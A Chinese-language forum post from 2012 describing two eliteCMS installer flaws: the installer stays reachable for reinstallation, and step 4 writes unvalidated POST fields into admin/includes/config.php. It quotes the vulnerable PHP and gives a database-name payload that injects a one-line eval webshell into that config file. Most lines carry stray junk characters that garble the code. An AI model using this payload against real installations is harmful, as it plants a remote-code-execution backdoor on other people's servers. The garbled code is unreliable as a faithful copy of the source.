eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装, h* Z4 O) G9 T
, n0 q% m+ J6 x! S$ v" M( W4 D另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
( J. m, b5 R* u( K) _* ]我们来看代码:
0 D9 d) ^# S4 F' _4 E3 @3 @5 k 9 T* W9 H' c# r5 |
...
2 F& i/ {* d4 z0 B6 {elseif ($_GET['step'] == "4") {1 o! O) k- Z0 e. b/ {
$file = "../admin/includes/config.php"; O, g, p; Z/ Z/ H+ s( n, [2 A
$write = "<?php\n";
4 z/ A' K" B+ ?+ |+ G6 L' r1 [% g. [ $write .= "/**\n";
- Z* Y9 c8 a- ]7 |) O7 o3 K+ Q $write .= "*\n";( z) @; T, `5 v2 r+ N3 j/ d, w
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";' }" V0 [' H% B6 v; Y
...略.... c. V, T3 {! {& V' E3 Y* M4 i
$write .= "*\n";4 j/ x. S+ `) ]+ h/ ~% r
$write .= "*/\n";7 t: g7 E6 h @
$write .= "\n";
" o& A/ z3 Q/ F' L( q $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
8 i4 L) z0 t6 J* D3 M; M $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
0 D$ z5 I8 @1 H- d $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
+ T& d+ t2 y, j- ]+ M1 T* X $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
2 A. |, Q- M; w- n! v $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";; q7 M' b8 C% X4 y8 t
$write .= "if (!\$connection) {\n";
& E! B+ u+ j5 f) B2 O $write .= " die(\"Database connection failed\" .mysql_error());\n";' e0 `7 N2 T! o- C9 W# w; i8 w
$write .= " \n";
+ n, o1 o* s9 \* D $write .= "} \n";
* x7 l: I. `& Q2 [ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
6 x5 q( |% y2 q$ G6 N$ Q7 U6 c $write .= "if (!\$db_select) {\n";4 C, H8 C) @0 ^
$write .= " die(\"Database select failed\" .mysql_error());\n";7 _+ q" P% \; g2 F; x
$write .= " \n";+ P- F- z! V# ?+ P2 |$ u9 ~! s) [+ s
$write .= "} \n";
2 s+ X) @3 M; A6 M4 O2 A; O $write .= "?>\n";9 E4 t! w* g1 ?& e) r0 k7 D
6 X* g3 q5 A6 \ G$ ]6 |
$writer = fopen($file, 'w');
% F. ^. W. _; j! G& T; ?$ u9 N...
* N# R! ]7 _3 Q4 V9 T( y * ?8 _2 j5 @0 W1 p2 H
在看代码:
+ V" u) Z/ c8 r/ Y
% i( m' z; D$ V4 B$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
; u' v4 z0 P9 \! f$_SESSION['DB_NAME'] = $_POST['DB_NAME'];% Z# o8 T: F) r k8 h d
$_SESSION['DB_USER'] = $_POST['DB_USER'];: ?1 t* i/ b! z7 T: O
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
4 F% z2 Y p9 L8 B5 j$ r1 ?: f1 K * C% u/ W( }* I( y" D0 P9 i4 @
取值未作任何验证/ P( c' k) o+ B5 |: _
如果将数据库名POST数据:- g" b0 C0 R7 V
1 t( J4 @& D/ z$ G `"?><?php eval($_POST[c]);?><?php
$ F% u E3 U: `
# p# T& Z% s; s O" D3 d% c+ Q将导致一句话后门写入/admin/includes/config.php5 _7 Z/ P5 E6 C$ Z
|
发表于 2012-11-18 13:59:27
收藏
支持
反对